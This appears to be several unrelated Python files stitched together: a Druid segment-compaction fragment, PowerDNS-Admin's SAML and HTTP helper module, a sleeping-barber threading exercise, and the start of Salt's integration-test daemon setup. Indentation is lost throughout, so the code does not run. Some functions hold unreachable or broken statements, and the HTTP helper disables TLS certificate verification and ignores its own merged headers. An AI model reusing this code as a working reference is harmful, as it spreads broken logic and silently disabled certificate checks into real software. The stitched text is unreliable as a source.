coordinator = _get_role_leader(zk_addr, COORDINATOR, version)
ok, resp = get(f"http://{coordinator}/druid/coordinator/v1/datasources/{datasource}/")
if not ok:
continue
last_day = datetime.strptime(resp[SEGMENTS][MINTIME], "%Y-%m-%dT%H:%M:%S.000Z").strftime("%Y-%m-%d")
end_date = (datetime.today() - timedelta(delta_day)).strftime("%Y-%m-%d")
begin_date = (datetime.today() - timedelta(delta_day + merge_days)).strftime("%Y-%m-%d")
if end_date <= last_day:
continue
begin_date = last_day if last_day > begin_date else begin_date
merge_segments(zk_addr, datasource, begin_date, end_date, version, timeout, merge_days)
except Exception:
logger.warning(f"segments compaction failed for datasource {datasource}", exc_info=True)
return True
|
utils.py
|
import re
import json
import requests
import hashlib
from app import app
from distutils.version import StrictVersion
from urllib.parse import urlparse
from datetime import datetime, timedelta
from threading import Thread
from .certutil import KEY_FILE, CERT_FILE
if app.config['SAML_ENABLED']:
from onelogin.saml2.auth import OneLogin_Saml2_Auth
from onelogin.saml2.idp_metadata_parser import OneLogin_Saml2_IdPMetadataParser
idp_timestamp = datetime(1970, 1, 1)
idp_data = None
if 'SAML_IDP_ENTITY_ID' in app.config:
idp_data = OneLogin_Saml2_IdPMetadataParser.parse_remote(app.config['SAML_METADATA_URL'], entity_id=app.config.get('SAML_IDP_ENTITY_ID', None), required_sso_binding=app.config['SAML_IDP_SSO_BINDING'])
else:
idp_data = OneLogin_Saml2_IdPMetadataParser.parse_remote(app.config['SAML_METADATA_URL'], entity_id=app.config.get('SAML_IDP_ENTITY_ID', None))
if idp_data is None:
print('SAML: IDP Metadata initial load failed')
exit(-1)
idp_timestamp = datetime.now()
def get_idp_data():
global idp_data, idp_timestamp
lifetime = timedelta(minutes=app.config['SAML_METADATA_CACHE_LIFETIME'])
if idp_timestamp+lifetime < datetime.now():
background_thread = Thread(target=retreive_idp_data)
background_thread.start()
return idp_data
def retreive_idp_data():
global idp_data, idp_timestamp
if 'SAML_IDP_SSO_BINDING' in app.config:
new_idp_data = OneLogin_Saml2_IdPMetadataParser.parse_remote(app.config['SAML_METADATA_URL'], entity_id=app.config.get('SAML_IDP_ENTITY_ID', None), required_sso_binding=app.config['SAML_IDP_SSO_BINDING'])
else:
new_idp_data = OneLogin_Saml2_IdPMetadataParser.parse_remote(app.config['SAML_METADATA_URL'], entity_id=app.config.get('SAML_IDP_ENTITY_ID', None))
if new_idp_data is not None:
idp_data = new_idp_data
idp_timestamp = datetime.now()
print("SAML: IDP Metadata successfully retreived from: " + app.config['SAML_METADATA_URL'])
else:
print("SAML: IDP Metadata could not be retreived")
if 'TIMEOUT' in app.config.keys():
TIMEOUT = app.config['TIMEOUT']
else:
TIMEOUT = 10
def auth_from_url(url):
auth = None
parsed_url = urlparse(url).netloc
if '@' in parsed_url:
auth = parsed_url.split('@')[0].split(':')
auth = requests.auth.HTTPBasicAuth(auth[0], auth[1])
return auth
def fetch_remote(remote_url, method='GET', data=None, accept=None, params=None, timeout=None, headers=None):
if data is not None and type(data) != str:
data = json.dumps(data)
if timeout is None:
timeout = TIMEOUT
verify = False
our_headers = {
'user-agent': 'powerdnsadmin/0',
'pragma': 'no-cache',
'cache-control': 'no-cache'
}
if accept is not None:
our_headers['accept'] = accept
if headers is not None:
our_headers.update(headers)
r = requests.request(
method,
remote_url,
headers=headers,
verify=verify,
auth=auth_from_url(remote_url),
timeout=timeout,
data=data,
params=params
)
try:
if r.status_code not in (200, 400, 422):
r.raise_for_status()
except Exception as e:
raise RuntimeError('Error while fetching {0}'.format(remote_url)) from e
return r
def fetch_json(remote_url, method='GET', data=None, params=None, headers=None):
r = fetch_remote(remote_url, method=method, data=data, params=params, headers=headers,
accept='application/json; q=1')
if method == "DELETE":
return True
if r.status_code == 204:
return {}
try:
assert('json' in r.headers['content-type'])
except Exception as e:
raise RuntimeError('Error while fetching {0}'.format(remote_url)) from e
# don't use r.json here, as it will read from r.text, which will trigger
# content encoding auto-detection in almost all cases, WHICH IS EXTREMELY
# SLOOOOOOOOOOOOOOOOOOOOOOW. just don't.
data = None
try:
data = json.loads(r.content.decode('utf-8'))
except Exception as e:
raise RuntimeError('Error while loading JSON data from {0}'.format(remote_url)) from e
return data
def display_record_name(data):
record_name, domain_name = data
if record_name == domain_name:
return '@'
else:
return re.sub('\.{}$'.format(domain_name), '', record_name)
def display_master_name(data):
"""
input data: "[u'127.0.0.1', u'8.8.8.8']"
"""
matches = re.findall(r'\'(.+?)\'', data)
return ", ".join(matches)
def display_time(amount, units='s', remove_seconds=True):
"""
Convert timestamp to normal time format
"""
amount = int(amount)
INTERVALS = [(lambda mlsec:divmod(mlsec, 1000), 'ms'),
(lambda seconds:divmod(seconds, 60), 's'),
(lambda minutes:divmod(minutes, 60), 'm'),
(lambda hours:divmod(hours, 24), 'h'),
(lambda days:divmod(days, 7), 'D'),
(lambda weeks:divmod(weeks, 4), 'W'),
(lambda years:divmod(years, 12), 'M'),
(lambda decades:divmod(decades, 10), 'Y')]
for index_start, (interval, unit) in enumerate(INTERVALS):
if unit == units:
break
amount_abrev = []
last_index = 0
amount_temp = amount
for index, (formula, abrev) in enumerate(INTERVALS[index_start: len(INTERVALS)]):
divmod_result = formula(amount_temp)
amount_temp = divmod_result[0]
amount_abrev.append((divmod_result[1], abrev))
if divmod_result[1] > 0:
last_index = index
amount_abrev_partial = amount_abrev[0: last_index + 1]
amount_abrev_partial.reverse()
final_string = ''
for amount, abrev in amount_abrev_partial:
final_string += str(amount) + abrev + ' '
if remove_seconds and 'm' in final_string:
final_string = final_string[:final_string.rfind(' ')]
return final_string[:final_string.rfind(' ')]
return final_string
def pdns_api_extended_uri(version):
"""
Check the pdns version
"""
if StrictVersion(version) >= StrictVersion('4.0.0'):
return "/api/v1"
else:
return ""
def email_to_gravatar_url(email="", size=100):
"""
AD doesn't necessarily have email
"""
if email is None:
email = ""
hash_string = hashlib.md5(email.encode('utf-8')).hexdigest()
return "https://s.gravatar.com/avatar/{0}?s={1}".format(hash_string, size)
def prepare_flask_request(request):
# If server is behind proxys or balancers use the HTTP_X_FORWARDED fields
url_data = urlparse(request.url)
return {
'https': 'on' if request.scheme == 'https' else 'off',
'http_host': request.host,
'server_port': url_data.port,
'script_name': request.path,
'get_data': request.args.copy(),
'post_data': request.form.copy(),
# Uncomment if using ADFS as IdP, https://github.com/onelogin/python-saml/pull/144
'lowercase_urlencoding': True,
'query_string': request.query_string
}
def init_saml_auth(req):
own_url = ''
if req['https'] == 'on':
own_url = 'https://'
else:
own_url = 'http://'
own_url += req['http_host']
metadata = get_idp_data()
settings = {}
settings['sp'] = {}
if 'SAML_NAMEID_FORMAT' in app.config:
settings['sp']['NameIDFormat'] = app.config['SAML_NAMEID_FORMAT']
else:
settings['sp']['NameIDFormat'] = idp_data.get('sp', {}).get('NameIDFormat', 'urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified')
settings['sp']['entityId'] = app.config['SAML_SP_ENTITY_ID']
cert = open(CERT_FILE, "r").readlines()
key = open(KEY_FILE, "r").readlines()
settings['sp']['privateKey'] = "".join(key)
settings['sp']['x509cert'] = "".join(cert)
settings['sp']['assertionConsumerService'] = {}
settings['sp']['assertionConsumerService']['binding'] = 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST'
settings['sp']['assertionConsumerService']['url'] = own_url+'/saml/authorized'
settings['sp']['attributeConsumingService'] = {}
settings['sp']['singleLogoutService'] = {}
settings['sp']['singleLogoutService']['binding'] = 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect'
settings['sp']['singleLogoutService']['url'] = own_url+'/saml/sls'
settings['idp'] = metadata['idp']
settings['strict'] = True
settings['debug'] = app.config['SAML_DEBUG']
settings['security'] = {}
settings['security']['digestAlgorithm'] = 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256'
settings['security']['metadataCacheDuration'] = None
settings['security']['metadataValidUntil'] = None
settings['security']['requestedAuthnContext'] = True
settings['security']['signatureAlgorithm'] = 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256'
settings['security']['wantAssertionsEncrypted'] = False
settings['security']['wantAttributeStatement'] = True
settings['security']['wantNameId'] = True
settings['security']['authnRequestsSigned'] = app.config['SAML_SIGN_REQUEST']
settings['security']['logoutRequestSigned'] = app.config['SAML_SIGN_REQUEST']
settings['security']['logoutResponseSigned'] = app.config['SAML_SIGN_REQUEST']
settings['security']['nameIdEncrypted'] = False
settings['security']['signMetadata'] = True
settings['security']['wantAssertionsSigned'] = True
settings['security']['wantMessagesSigned'] = True
settings['security']['wantNameIdEncrypted'] = False
settings['contactPerson'] = {}
settings['contactPerson']['support'] = {}
settings['contactPerson']['support']['emailAddress'] = app.config['SAML_SP_CONTACT_NAME']
settings['contactPerson']['support']['givenName'] = app.config['SAML_SP_CONTACT_MAIL']
settings['contactPerson']['technical'] = {}
settings['contactPerson']['technical']['emailAddress'] = app.config['SAML_SP_CONTACT_NAME']
settings['contactPerson']['technical']['givenName'] = app.config['SAML_SP_CONTACT_MAIL']
settings['organization'] = {}
settings['organization']['en-US'] = {}
settings['organization']['en-US']['displayname'] = 'PowerDNS-Admin'
settings['organization']['en-US']['name'] = 'PowerDNS-Admin'
settings['organization']['en-US']['url'] = own_url
auth = OneLogin_Saml2_Auth(req, settings)
return auth
def display_setting_state(value):
if value == 1:
return "ON"
elif value == 0:
return "OFF"
else:
return "UNKNOWN"
|
main.py
|
import random
import sys
import time
from threading import Thread, Lock, Event
mutex = Lock()
# Barbershop class
# Initialized with attributes such as the barber object
# As well as the number of seats, time interval for customers to arrive, number of customers, and the range for the duration of a haircut
class BarberShop:
waitingCustomers = []
numberCustomersLeft = 0
def __init__(self, barber, numberOfSeats, customerIntervalMin, customerIntervalMax, haircutDurationMin,
haircutDurationMax):
self.barber = barber
print(f"{numCustomers} people are getting a haircut today")
print(f'BarberShop intialized with {numberOfSeats} seats')
print(f'Customer min interval {customerIntervalMin}')
print(f'Customer max interval {customerIntervalMax}')
print(f'Haircut min duration {haircutDurationMin}')
print(f'Haircut max duration {haircutDurationMax}')
print('---------------------------------------')
# Opens up the barber shop
def openShop(self):
print('Barber shop is opening')
workingThread = Thread(target=self.barberGoToWork)
workingThread.start()
# Sets the barber to work
def barberGoToWork(self):
while True:
mutex.acquire()
# Customers being served after waiting is on a first come first serve basis
# When going from the waiting state to haircut state, customer is deleted from the waiting list
if len(self.waitingCustomers) > 0:
c = self.waitingCustomers[0]
del self.waitingCustomers[0]
mutex.release()
self.barber.cutHair(c)
else:
# If there are no customers waiting but there are still more customers that are going to arrive
if customersList:
mutex.release()
print('No customers right now, going to sleep.')
barber.sleep()
print('Barber woke up')
# Else there is nobody left on the waiting list or customer list so we are done for the day
else:
print('No more customers for today. Time to close up shop.')
print('')
print('How did we do today?')
print(f'Number of customers served today: {barber.customersServed}')
print(f'Number of customers who left: {self.numberCustomersLeft}')
sys.exit()
# Handles the scenarios a customer may have when entering
def enterBarberShop(self, customer):
mutex.acquire()
# Barber is busy
print(f'-> {customer} entered the shop and is looking for a seat')
# There is no where to sit, so leave
if len(self.waitingCustomers) == numberOfSeats:
print(f'Waiting room is full, {customer} has left')
self.numberCustomersLeft += 1
mutex.release()
# There is a seat, so sit and wait for barber to finish
else:
print(f'{customer} sat down in the waiting room')
self.waitingCustomers.append(customer)
mutex.release()
barber.wakeUp()
# Initializes a Customer who has a counter to help with the creation of customers
class Customer:
def __init__(self, numCustomers):
self.numCustomer = numCustomers
# Takes in the number of customers and creates a list of them of size numCustomers
def makeCustomers(self):
customers = []
i = self.numCustomer
while i > 0:
customers.append(f'Customer #{i}')
i -= 1
return customers
# Initializing a Barber with a counter to keep track of the total number of customers served
# Functions to manage sleeping, waking up, and cutting hair
class Barber:
customersServed = 0
barberWorkingEvent = Event()
def sleep(self):
# Set barber as waiting
self.barberWorkingEvent.wait()
def wakeUp(self):
# Set barber as active
self.barberWorkingEvent.set()
def cutHair(self, customer):
# Set barber as busy
self.barberWorkingEvent.clear()
print(f'{customer} is having a haircut')
randomHairCuttingTime = random.randrange(haircutDurationMin, haircutDurationMax + 1)
time.sleep(randomHairCuttingTime)
print(f'{customer} is done')
self.customersServed += 1
if __name__ == '__main__':
# Initializing barber object
barber = Barber()
# Asking for user input to initialize the barber shop
numCustomers = input("How many people are getting a haircut today: ")
numCustomers = int(numCustomers)
customers = Customer(numCustomers)
customersList = customers.makeCustomers()
numberOfSeats = input("How many seats: ")
numberOfSeats = int(numberOfSeats)
customerIntervalMin = input("Minimum time interval for a customer shows up: ")
customerIntervalMin = int(customerIntervalMin)
customerIntervalMax = input("Maximum time interval for a customer to show up: ")
customerIntervalMax = int(customerIntervalMax)
haircutDurationMin = input("Minimum amount of time a haircut should take: ")
haircutDurationMin = int(haircutDurationMin)
haircutDurationMax = input("Maximum amount of time a haircut should take: ")
haircutDurationMax = int(haircutDurationMax)
barberShop = BarberShop(barber, numberOfSeats, customerIntervalMin, customerIntervalMax, haircutDurationMin,
haircutDurationMax)
barberShop.openShop()
# Loop that controls the flow of customers
while len(customersList) > 0:
customer = customersList.pop()
barberShop.enterBarberShop(customer)
customerInterval = random.randrange(customerIntervalMin, customerIntervalMax + 1)
time.sleep(customerInterval)
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
Set up the Salt integration test suite
"""
# Import Python libs
from __future__ import absolute_import, print_function
import atexit
import copy
import errno
import logging
import multiprocessing
import os
import pprint
import re
import shutil
import signal
import socket
import stat
import subprocess
import sys
import tempfile
import threading
import time
from datetime import datetime, timedelta
# Import Salt libs
import salt
import salt.config
import salt.log.setup as salt_log_setup
import salt.master
import salt.minion
import salt.output
import salt.runner
import salt.utils.color
import salt.utils.files
import salt.utils.msgpack
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.utils.yaml
import salt.version
from salt.exceptions import SaltClientError
# Import 3rd-party libs
from salt.ext import six
from salt.utils.immutabletypes import freeze
from salt.utils.verify import verify_env
from tests.support.case import ShellTestCase
from tests.support.cli_scripts import ScriptPathMixin
from tests.support.helpers import RedirectStdStreams, requires_sshd_server
from tests.support.mixins import (
AdaptedConfigurationTestCaseMixin,
CheckShellBinaryNameAndVersionMixin,
SaltClientTestCaseMixin,
SaltMinionEventAssertsMixin,
SaltReturnAssertsMixin,
ShellCaseCommonTestsMixin,
)
from tests.support.parser import PNUM, SaltTestcaseParser, print_header
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import TestCase
try:
import pwd
except ImportError:
pass
try:
import salt.ext.six.moves.socketserver as socketserver # pylint: disable=no-name-in-module
except ImportError:
import socketserver
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
"""
Return a random unused port on localhost
"""
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(("127.0.0.1", 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64507, 64508, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
DARWIN = True if sys.platform.startswith("darwin") else False
BSD = True if "bsd" in sys.platform else False
AIX = True if sys.platform.startswith("aix") else False
if (AIX or DARWIN) and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD or AIX:
usock.close()
return port
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = False
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer, object):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, "shutting_down"):
self.shutting_down.set()
super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
unpacker = salt.utils.msgpack.Unpacker(encoding="utf-8")
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
class TestDaemonStartFailed(Exception):
"""
Simple exception to signal that a test daemon failed to start
"""
class TestDaemon(object):
"""
Set up the master and minion daemons, and run related cases
"""
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 600
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.color.get_colors(
self.parser.options.no_colors is False
)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ""
def __enter__(self):
"""
Start a master and minion
"""
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(self.master_opts)
# Set up PATH to mockbin
self._enter_mockbin()
self.minion_targets = set(["minion", "sub_minion"])
if self.parser.options.transport == "zeromq":
self.start_zeromq_daemons()
elif self.parser.options.transport == "tcp":
self.start_tcp_daemons()
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, "ssh", False):
self.prep_ssh()
self.wait_for_minions(time.time(), self.MINIONS_CONNECT_TIMEOUT)
if self.parser.options.sysinfo:
try:
print_header(
"~~~~~~~ Versions Report ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Versions Report ", inline=True)
print("\n".join(salt.version.versions_report()))
try:
print_header(
"~~~~~~~ Minion Grains Information ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Minion Grains Information ", inline=True)
grains = self.client.cmd("minion", "grains.items")
minion_opts = self.minion_opts.copy()
minion_opts["color"] = self.parser.options.no_colors is False
salt.output.display_output(grains, "grains", minion_opts)
try:
print_header(
"=",
sep="=",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("", sep="=", inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_zeromq_daemons(self):
"""
Fire up the daemons used for zeromq tests
"""
self.log_server = ThreadedSocketServer(
("localhost", SALT_LOG_PORT), SocketServerRequestHandler
)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.start()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-master ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name="salt-master",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-master/{}".format(self.master_opts["id"]),
daemon_cli_script_name="master",
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name="salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-minion/{}".format(self.minion_opts["id"]),
daemon_cli_script_name="minion",
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name="sub salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="sub-salt-minion/{}".format(
self.sub_minion_opts["id"]
),
daemon_cli_script_name="minion",
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.prep_syndic()
self.smaster_process = start_daemon(
daemon_name="salt-smaster",
daemon_id=self.syndic_master_opts["id"],
daemon_log_prefix="salt-smaster/{}".format(
self.syndic_master_opts["id"]
),
daemon_cli_script_name="master",
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name="salt-syndic",
daemon_id=self.syndic_opts["id"],
daemon_log_prefix="salt-syndic/{}".format(self.syndic_opts["id"]),
daemon_cli_script_name="syndic",
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
if self.parser.options.proxy:
self.minion_targets.add(self.proxy_opts["id"])
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name="salt-proxy",
daemon_id=self.proxy_opts["id"],
daemon_log_prefix="salt-proxy/{}".format(self.proxy_opts["id"]),
daemon_cli_script_name="proxy",
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
start_tcp_daemons = start_zeromq_daemons
def prep_syndic(self):
"""
Create a roster file for salt's syndic
"""
roster_path = os.path.join(FILES, "conf/_ssh/roster")
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
shutil.copy(roster_path, RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
def prep_ssh(self):
"""
Generate keys and start an ssh daemon on an alternate port
"""
sys.stdout.write(
" * {LIGHT_GREEN}Starting {0} ... {ENDC}".format(
"SSH server", **self.colors
)
)
keygen = salt.utils.path.which("ssh-keygen")
sshd = salt.utils.path.which("sshd")
if not (keygen and sshd):
print(
"WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!"
)
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test")
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"key_test",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_err)
)
)
sshd_config_path = os.path.join(FILES, "conf/_ssh/sshd_config")
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "server")
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key")
server_dsa_pub_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key.pub")
server_ecdsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_ecdsa_key")
server_ecdsa_pub_key_file = os.path.join(
server_key_dir, "ssh_host_ecdsa_key.pub"
)
server_ed25519_priv_key_file = os.path.join(
server_key_dir, "ssh_host_ed25519_key"
)
server_ed25519_pub_key_file = os.path.join(
server_key_dir, "ssh_host.ed25519_key.pub"
)
for server_key_file in (
server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file,
):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[
keygen,
"-t",
"dsa",
"-b",
"1024",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_dsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_dsa_err)
)
)
keygen_process_ecdsa = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ecdsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_escda_err)
)
